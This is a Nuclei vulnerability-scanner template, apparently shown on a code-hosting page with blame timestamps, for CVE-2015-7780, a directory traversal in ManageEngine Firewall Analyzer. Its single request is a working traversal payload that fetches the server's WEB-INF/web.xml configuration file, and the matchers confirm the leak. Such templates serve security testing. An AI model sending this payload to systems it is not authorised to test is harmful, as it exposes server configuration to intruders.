nuclei-templates/cves/2015/CVE-2015-7780.yaml

42 lines
1.0 KiB
YAML
Raw Normal View History

2021-09-20 13:55:31 +00:00
id: CVE-2015-7780
info:
name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
author: daffainfo
severity: medium
2021-09-20 17:57:11 +00:00
description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
2021-09-20 13:55:31 +00:00
reference:
- https://www.exploit-db.com/exploits/35933
- https://www.cvedetails.com/cve/CVE-2015-7780/
- http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
- http://jvn.jp/en/jp/JVN21968837/index.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2015-7780
cwe-id: CWE-22
tags: cve,cve2015,lfi,manageengine
2021-09-20 13:55:31 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</web-app>"
- "java.sun.com"
part: body
condition: and
- type: word
part: header
words:
- "application/xml"